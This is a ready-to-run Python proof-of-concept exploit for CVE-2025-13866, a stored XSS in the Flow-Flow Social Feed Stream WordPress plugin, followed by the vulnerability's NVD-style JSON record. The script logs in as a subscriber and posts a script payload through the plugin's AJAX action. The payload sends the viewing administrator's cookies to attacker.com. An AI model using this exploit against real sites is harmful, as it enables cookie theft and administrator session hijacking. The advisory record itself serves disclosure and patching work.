CVE-2025-13866

import requests import sys # CVE-2025-13866 PoC - Stored XSS via AJAX # Target: WordPress with Flow-Flow Social Feed Stream Plugin (<=4.7.5) target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" username = sys.argv[2] if len(sys.argv) > 2 else "subscriber" password = sys.argv[3] if len(sys.argv) > 3 else "password" # XSS payload xss_payload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>' def exploit_stored_xss(): session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Logged in successfully as subscriber") # Step 2: Exploit the vulnerability via AJAX ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'flow_flow_social_auth', 'stream_id': '1', 'profile_text': xss_payload, 'submit': 'Save' } ajax_response = session.post(ajax_url, data=exploit_data) if ajax_response.status_code == 200: print("[+] XSS payload sent successfully") print("[+] Payload stored in plugin settings") print("[*] Wait for admin to visit plugin settings page") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-13866", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:42.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flow-Flow Social Feed Stream plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the flow_flow_social_auth AJAX action in versions 3.0.0 to 4.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings and store arbitrary JavaScript that executes whenever the plugin settings page is viewed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/FlowFlowActivator.php#L224", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/db/FFDBManager.php#L24", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/065d01b6-30e0-4bc8-bd70-25996c2df879?source=cve", "source": "[email protected]"}]}}